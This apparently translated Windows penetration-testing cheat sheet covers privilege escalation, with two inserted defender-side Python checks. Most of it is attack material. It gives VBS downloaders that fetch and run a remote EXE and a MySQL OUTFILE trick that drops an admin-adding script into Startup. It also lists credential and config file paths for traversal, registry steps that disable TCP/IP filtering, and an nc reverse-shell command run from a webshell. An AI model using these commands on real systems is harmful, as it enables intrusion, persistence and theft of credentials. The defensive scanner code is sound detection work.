Windows Penetration Testing and Privilege Escalation Summary (2)

VBS downloader:

1:
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs

2:

On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
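As an added example from the defender's side (written for this page, not code from the original post): a Python scanner that flags scripts in a folder such as the All Users Startup folder when they show the pattern of the downloader and startup scripts above (XMLHTTP fetch, ADODB.Stream write, WScript.Shell launch, net user /add). The sample scripts it scans are constructed inline, and a temporary directory stands in for the Startup folder.

```python
import os
import re
import tempfile

# Indicators drawn from the scripts above; split strings ("Mi"+"cro"+"soft") are joined first.
INDICATORS = [
    ("HTTP fetch via XMLHTTP", re.compile(r"microsoft\.xmlhttp|msxml2\.xmlhttp", re.I)),
    ("binary write via ADODB.Stream", re.compile(r"adodb\.stream", re.I)),
    ("SaveToFile to disk", re.compile(r"\.savetofile\b", re.I)),
    ("process launch via WScript.Shell", re.compile(r"wscript\.shell", re.I)),
    ("local admin creation", re.compile(r"net\s+(user|localgroup)\b.*\badd\b", re.I)),
]
SCRIPT_EXT = {".vbs", ".vbe", ".bat", ".cmd", ".js", ".wsf"}

def deobfuscate(text: str) -> str:
    """Join concatenated string pieces ("Mi"+"cro"+"soft") back together."""
    return re.sub(r'"\s*[+&]\s*"', "", text)

def classify(text: str) -> list[str]:
    """Return the names of all indicators that match a script body."""
    flat = deobfuscate(text)
    return [name for name, rx in INDICATORS if rx.search(flat)]

def scan_dir(path: str, min_hits: int = 2) -> dict[str, list[str]]:
    """Scan a folder (e.g. the All Users Startup folder); returns {filename: [indicators]}."""
    findings = {}
    for name in sorted(os.listdir(path)):
        if os.path.splitext(name)[1].lower() not in SCRIPT_EXT:
            continue
        with open(os.path.join(path, name), encoding="utf-8", errors="replace") as fh:
            hits = classify(fh.read())
        if len(hits) >= min_hits:
            findings[name] = hits
    return findings

# Constructed samples (not real malware): a split-string downloader like the
# one above, and a harmless script that should not be flagged.
SAMPLE_DOWNLOADER = (
    's1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"\n'
    'Set sGet = CreateObject(s2):sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2\n'
)
SAMPLE_BENIGN = 'Set fso = CreateObject("Scripting.FileSystemObject")\n'

def demo() -> dict[str, list[str]]:
    """Drop both samples into a temporary 'Startup' folder and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for fname, body in (("a.vbs", SAMPLE_DOWNLOADER), ("disk.vbs", SAMPLE_BENIGN)):
            with open(os.path.join(d, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_dir(d)
```

Point scan_dir at the real Startup folder and %WINDIR% on a suspect host; a single indicator on its own is common in legitimate scripts, so the threshold matters.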

Directory tricks in cmd:

List all directories on D:

for /d %i in (d:\freehost\*) do @echo %i

Show only the folders in the current path whose names are 1-3 characters long:

for /d %i in (???) do @echo %i

Using the current directory as the search root, list every EXE file in it and its subdirectories:

for /r %i in (*.exe) do @echo %i

Using a specified directory as the search root, list every file in it and its subdirectories:

for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i

This displays the contents of a.txt, because /f reads the file line by line:

for /f %i in (c:\1.txt) do echo %i

The space after delims= is the delimiter; tokens selects which field to take:

for /f "tokens=2 delims= " %i in (a.txt) do echo %i

Some common paths on Windows systems (the C: drive can be swapped for D: or E:; for example, Xingwai (FreeHost) and Huazhong (hzhost) virtual hosting panels are usually installed on D:):

c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe
c:\hzhost\databases\url.asp
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
c:\wwwsite\default.asp
c:\WWWROOT\default.asp
c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
c:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmail\Foxmail.exe
C:\Program Files\Foxmail\accounts.cfg
C:\Program Files\tencent\Foxmail\Foxmail.exe
C:\Program Files\tencent\Foxmail\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe

Relative paths of configuration files for various web applications:

/config.php
../../config.php
../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
../../../conn.asp
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/index.php
./index.php
../../index.php
../index.php
../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp

Removing TCP/IP filtering:

TCP/IP filtering lives in three places in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Export each of the three keys with the following commands:

regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Then, in each of the three files, change:

"EnableSecurityFilters"=dword:00000001

to:

"EnableSecurityFilters"=dword:00000000

and import the three files back into the registry with the following commands:

regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
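An added defender-side check (not from the original page): parse a regedit export like the ones above and report, per Tcpip key, whether EnableSecurityFilters is still 1, so that the edit described above shows up in a comparison of the three control sets. The .reg text is constructed; it places the value under the Tcpip\Parameters subkey, which is where Windows stores it and which an export of the Tcpip key includes.

```python
import re

SECTION_RX = re.compile(r"^\[(.+)\]$")
DWORD_RX = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def parse_reg_dwords(text: str) -> dict[str, dict[str, int]]:
    """Parse a regedit export into {key_path: {value_name: dword}}.
    Only REG_DWORD lines are kept; strings, binaries and the header are skipped."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := SECTION_RX.match(line)):
            current = m.group(1)
            result.setdefault(current, {})
        elif (m := DWORD_RX.match(line)) and current is not None:
            result[current][m.group(1)] = int(m.group(2), 16)
    return result

def tcpip_filter_state(text: str) -> dict[str, bool]:
    """For every Tcpip key in the export carrying EnableSecurityFilters,
    report whether TCP/IP filtering is still switched on (value == 1)."""
    return {
        key: values["EnableSecurityFilters"] == 1
        for key, values in parse_reg_dwords(text).items()
        if "\\services\\tcpip" in key.lower() and "EnableSecurityFilters" in values
    }

def disabled_keys(text: str) -> list[str]:
    """Keys where filtering has been turned off, i.e. what the edit above produces."""
    return [key for key, enabled in tcpip_filter_state(text).items() if not enabled]

def load_reg(path: str) -> str:
    """regedit writes exports as UTF-16LE with a BOM; older ANSI exports lack it."""
    with open(path, "rb") as fh:
        data = fh.read()
    return data.decode("utf-16") if data.startswith(b"\xff\xfe") else data.decode("latin-1")

# Constructed export (not from a real host): ControlSet002 has been switched off.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters]
"EnableSecurityFilters"=dword:00000001
"DataBasePath"="%SystemRoot%\\System32\\drivers\\etc"

[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet002\\Services\\Tcpip\\Parameters]
"EnableSecurityFilters"=dword:00000000

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters]
"EnableSecurityFilters"=dword:00000001
"""
```

Run disabled_keys(load_reg(path)) over a fresh export of each key to confirm all three control sets still agree.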

Webshell privilege-escalation tips:

cmd path:

c:\windows\temp\cmd.exe

nc is in the same directory; for example, to get a reverse cmd shell:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

This usually fails.

But putting only the nc path in the cmd-path field:

c:\windows\temp\nc.exe

and entering in the command field:

-vv ip 999 -e c:\windows\temp\cmd.exe

does succeed. That is not the main point, though:

we usually also have to invoke pr.exe or Churrasco.exe the same way for them to work.

Packing with RAR from the command line:

rar a -k -r -s -m3 c:\1.rar c:\folde